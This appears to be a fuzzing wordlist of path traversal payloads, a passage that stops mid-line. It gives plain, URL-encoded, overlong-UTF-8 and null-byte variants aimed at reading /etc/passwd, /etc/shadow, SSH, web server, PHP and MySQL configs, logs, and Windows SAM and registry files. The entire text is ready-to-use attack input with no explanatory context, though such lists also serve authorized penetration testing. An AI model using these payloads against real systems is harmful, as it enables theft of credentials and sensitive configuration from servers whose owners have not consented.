../../../../../../../../../etc/passwd
../../../../../../../../../etc/shadow
../../../../../../../../../etc/group
../../../../../../../../../etc/hosts
../../../../../../../../../etc/mysql/my.cnf
../../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0
../../../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../../../var/lib/mysql/my.cnf
../../../../../../../../../var/log/apache/access.log
../../../../../../../../../var/log/apache/error.log
../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../var/log/nginx/error.log
../../../../../../../../../var/log/syslog
../../../../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../../../etc/passwd
../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00
../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fgroup
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fgroup%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%0d%0a
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%0d%0a
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fgroup%0d%0a
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%0a
..%2f..%2f..%2f..%2f..%2f..%2
../../../../../../../../etc/passwd%00
../..//../..//../..//../..//../..//../..//etc/passwd%00
../../../etc/httpd/conf/httpd.conf%00
../../../etc/ssh/ssh_config%00
../../../usr/local/apache/conf/httpd.conf%00
../../../../../../../../boot.ini%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd%00
../..//../..//../..//../..//../..//../..//windows/system32/drivers/etc/hosts%00
../../../usr/local/apache2/conf/httpd.conf%00
....................\etc\passwd%00
../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../etc/shadow%00
../..//../..//../..//../..//../..//../..//windows/system32/inetsrv/config/applicationHost.config%00
../..//../..//../..//../..//../..//../..//windows/system32/inetsrv/config/redirection.config%00
../../../etc/mysql/my.cnf%00
../../../etc/ssh/sshd_config%00
../../../../../../../../windows/repair/sam%00
../../../../../../../../windows/system32/config/software%00
../../../../../../../../windows/system32/config/system%00
../../../../../../../../windows/repair/system%00
../../../../../../../../windows/repair/software%00
../../../../../../../../etc/httpd/logs/access_log%00
../../../etc/httpd/logs/access_log%00
../../../../../../../../var/log/httpd/access_log%00
../../../../../../../../var/log/apache/access.log%00
../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../etc/mysql/my.cnf%00
../../../../../../../../etc/my.cnf%00
../../../../../../../../etc/httpd/conf.d/%00
../../../../../../../../etc/apache2/conf.d/%00
../../../../../../../../etc/httpd/httpd.conf%00
../../../../../../../../etc/httpd/conf/httpd.conf%00
../../../../../../../../usr/local/etc/apache/httpd.conf%00
../../../../../../../../usr/local/etc/httpd/httpd.conf%00
../../../../../../../../usr/local/apache2/conf/httpd.conf%00
../../../../../../../../usr/local/apache/conf/httpd.conf%00
../../../../../../../../usr/local/apps/apache/conf/httpd.conf%00
../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00
../../../../../../../../etc/php.ini%00
../../../../../../../../etc/php/php.ini%00
../../../../../../../../usr/local/lib/php.ini%00
../../../../../../../../usr/local/etc/php.ini%00
../../../../../../../../usr/local/cpanel/3rdparty/etc/php.ini%00
../../../../../../../../etc/my.conf%00
../../../../../../../../etc/httpd/modules/mod_alias.so%00
../../../../../../../../etc/httpd/modules/mod_cgi.so%00
../../../../../../../../etc/httpd/modules/mod_log
